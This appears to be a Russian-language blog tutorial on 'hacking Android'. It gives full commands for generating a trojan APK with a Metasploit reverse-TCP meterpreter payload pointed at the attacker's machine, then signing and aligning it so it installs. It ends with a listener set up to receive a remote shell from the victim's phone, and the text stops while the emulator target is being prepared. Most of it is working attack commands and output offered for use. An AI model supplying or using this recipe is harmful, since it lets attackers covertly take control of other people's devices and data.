Thank you for reading this post, don't forget to subscribe!
Предпосылки для взлома Android
- Kali Linux
- Android телефон: Для демонстрационных целей использовался Android emulator предоставленный Google.
Шаги для взлома Android
1. Создать Payload
Чтобы создать троян для взлома Android, нам нужно создать полезную нагрузку, используя утилиту msfvenom в Kali Linux.
1 2 3 4 5 |
root@destroyer:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.50 LPORT=4444 R > /root/MyPath/my0704.apk No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size: 9485 bytes |
В приведенной выше команды LHOST задан IP, используется в команде ifconfig от Kali Linux.
Вышеуказанная команда создает троянский файл apk, который будет установлен на целевой телефон для использования, однако перед этим мы должны подписать этот apk для правильной установки. Следуйте шагам ниже по списку для этого.
а. Создание хранилища ключей:
1 |
root@destroyer:~# keytool -genkey -v -keystore my-release-key.Keystore -alias app -keyalg RSA -keysize 2048 -validity 10000 |
Выше команда спрашивает вопросы и пароль.
б. Подписать созданный файл с помощью jarsigner apk.
1 2 3 4 5 6 7 8 9 10 11 |
root@destroyer:~# jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore /root/MyPath/my0704.apk app Enter Passphrase for keystore: adding: META-INF/APP.SF adding: META-INF/APP.RSA signing: classes.dex signing: AndroidManifest.xml signing: resources.arsc jar signed. Warning: No -tsa or -tsacert is provided and this jar is not timestamped. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2044-08-21) or after any future revocation date. |
с. Проверьте apk, созданный с помощью jarsigner.
1 |
root@destroyer:~# jarsigner -verify -verbose -certs /root/MyPath/my0704.apk |
д. Оптимизация файла с помощью zipalign apk.
Перед тем как начать работу, установите zipalign с помощью команды ниже:
1 |
apt-get install zipalign |
Теперь позвольте оптимизировать apk.
1 2 3 4 5 6 7 8 9 10 11 12 |
root@destroyer:~# zipalign -v 4 /root/MyPath/my0704.apk /root/MyPath/my0704_sign.apk Verifying alignment of /root/MyPath/my0704_sign.apk (4)... 50 META-INF/MANIFEST.MF (OK - compressed) 281 META-INF/APP.SF (OK - compressed) 623 META-INF/APP.RSA (OK - compressed) 1752 META-INF/ (OK) 1802 META-INF/SIGNFILE.SF (OK - compressed) 2087 META-INF/SIGNFILE.RSA (OK - compressed) 2750 classes.dex (OK - compressed) 8726 AndroidManifest.xml (OK - compressed) 10443 resources.arsc (OK - compressed) Verification successful |
Таким образом, наш окончательный apk, который мы используем для взлома андроида назван как «my0704_sign.apk».
2. Запустите msfconsole на Kali Linux для эксплуатации телефона Android.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
root@destroyer:~# msfconsole Call trans opt: received. 05-01-17 20:00:10 REC:Loc Trace program: running wake up, Neo... the matrix has you follow the white rabbit. knock, knock, Neo. (`. ,-, ` `. ,;' / `. ,'/ .' `. X /.' .-;--''--.._` ` ( .' / ` , ` ' Q ' , , `._ \ ,.| ' `-.;_' : . ` ; ` ` --,.._; ' ` , ) .' `._ , ' /_ ; ,''-,;' ``- ``-..__``--` http://metasploit.com Easy phishing: Set up email templates, landing pages and listeners in Metasploit Pro -- learn more on http://rapid7.com/metasploit =[ metasploit v4.12.22-dev ] + -- --=[ 1577 exploits - 906 auxiliary - 272 post ] + -- --=[ 455 payloads - 39 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf > |
В приведенной выше строке msf запустить полезную нагрузку на андроид и мультиобработчик команд exploit с помощью ниже:
1 2 3 4 |
msf > use exploit/multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp payload => android/meterpreter/reverse_tcp msf exploit(handler) > |
В команде ниже мы используем IP Kali Linux, может быть взят с помощью команды ifconfig на Kali Linux. Кроме того, мы используем номер порта 4444 для эксплуатации.
1 2 3 4 5 |
msf exploit(handler) > set LHOST 192.168.0.50 LHOST => 192.168.0.50 msf exploit(handler) > set LPORT 4444 LPORT => 4444 msf exploit(handler) > |
А затем, наконец, использовать команду, которая будет ждать исполнения apk на телефоне Android.
1 2 3 4 |
msf exploit(handler) > exploit [*] Started reverse TCP handler on 192.168.0.50:4444 [*] Starting the payload handler... |
Выполнение apk на андроиде.
Здесь мы используем Android эмулятор предоставленный Google. Следовательно , вам необходимо загрузить образ ISO с сайта Google.
После загрузки вы можете создать нормальную виртуальную машину VMware и смонтировать этот ISO на виртуальной машине, чтобы запустить виртуальную машину машину. Настройка Android VM с помощью id gmail.